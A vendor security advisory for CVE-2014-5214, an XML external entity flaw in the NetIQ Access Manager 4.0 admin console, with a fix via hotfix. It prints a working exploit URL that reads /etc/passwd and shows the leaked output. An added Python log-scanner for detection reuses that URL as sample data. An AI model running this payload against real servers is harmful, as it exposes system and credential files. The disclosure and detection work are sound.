Environment
NetIQ Access Manager 4.0
NetIQ Access Manager 4.0 Support Pack 1 HF2 applied
CVE-2014-5214
Situation
Access Manager 4.0 is set up and working fine: users can access protected resources behind the Access Gateway after successfully authenticating against the Identity Server. However, it is possible to execute an XML eXternal Entity Injection (XXE; see https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing for more details) against the Access Manager Administration Console server running iManager.
As an example, the following URL demonstrates the retrieval of the /etc/passwd file as an authenticated administrative user:
https://147.2.33.233:2443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=%3C!DOCTYPE+request+[%0A%3C!ENTITY+include+SYSTEM+%22/etc/passwd%22%3E%0A]%3E%3Cquery%3E%3Ccontainer%3E%26include%3b%3C/container%3E%3Csubclasses%3Efalse%3C/subclasses%3E%3C/query%3E
The resulting error message is displayed with all user-specific information from that file:
Error Error: Invalid advanced selection
Container not found: at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
:
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ncashell:x:1000:100:ncashell:/home/ncashell:/bin/bash
novlwww:x:108:113:Novell System User:/var/opt/novell/novlwww:/bin/bash
CVE-2014-5214 has been created and assigned to this discovery.
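Added example (not from the NetIQ advisory or the product): a log check that decodes the query parameter of webacc requests and flags inline DTDs declaring external entities, the pattern shown in the URL above. The log lines are constructed; the check also catches parameter (%) entities, which the advisory's example does not use.

```python
import re
from urllib.parse import parse_qs, urlsplit

WEBACC_PATH = "/nps/servlet/webacc"
# Entity declaration backed by an external resource: SYSTEM "uri" or PUBLIC "pubid" "uri".
# The optional "% " prefix also catches parameter entities (not used in the advisory's URL).
EXTERNAL_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s+)?(?P<name>\S+)\s+'
    r'(?:SYSTEM|PUBLIC\s+["\'][^"\']*["\'])\s+'
    r'["\'](?P<uri>[^"\']*)["\']',
    re.IGNORECASE,
)
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_target(target):
    """Return findings for one request target (path?query), or None if nothing suspicious."""
    parts = urlsplit(target)
    if parts.path != WEBACC_PATH:
        return None
    # parse_qs percent-decodes values, so "%3C!DOCTYPE" is matched as "<!DOCTYPE".
    params = parse_qs(parts.query, keep_blank_values=True)
    for raw in params.get("query", []):
        if "<!DOCTYPE" not in raw.upper():
            continue  # no inline DTD, so no entity declarations possible
        entities = [(m["name"], m["uri"]) for m in EXTERNAL_ENTITY_RE.finditer(raw)]
        if entities:
            return {"taskId": params.get("taskId", [""])[0], "entities": entities}
    return None


def scan_access_log(lines):
    """Yield (client_ip, findings) for each log line whose request matches the XXE pattern."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        findings = inspect_target(m["target"])
        if findings:
            yield line.split(" ", 1)[0], findings


# Constructed sample log lines (not from a real system); the second reuses the request
# shape from the advisory above.
SAMPLE_LOG = [
    '10.0.0.5 - admin [21/Nov/2014:10:15:01 +0100] "GET /nps/servlet/webacc?taskId=fw.Startup&merge=fw.Main HTTP/1.1" 200 5120',
    '10.0.0.9 - admin [21/Nov/2014:10:16:42 +0100] "GET /nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=%3C!DOCTYPE+request+[%0A%3C!ENTITY+include+SYSTEM+%22/etc/passwd%22%3E%0A]%3E%3Cquery%3E%3Ccontainer%3E%26include%3b%3C/container%3E%3Csubclasses%3Efalse%3C/subclasses%3E%3C/query%3E HTTP/1.1" 200 2210',
]
```

Running scan_access_log(SAMPLE_LOG) yields one hit, for the second line, naming the entity include and its SYSTEM target /etc/passwd; POST bodies are not covered, since only the request target is inspected.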
Resolution
Apply Access Manager 4.0 Support Pack 1 Hot Fix 3 (4.0.1 HF3) or greater to address this issue.
Additional Information
NetIQ thanks Wolfgang Ettlinger (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab (https://www.sec-consult.com/) for responsibly reporting the identified issues and working with us as we addressed them.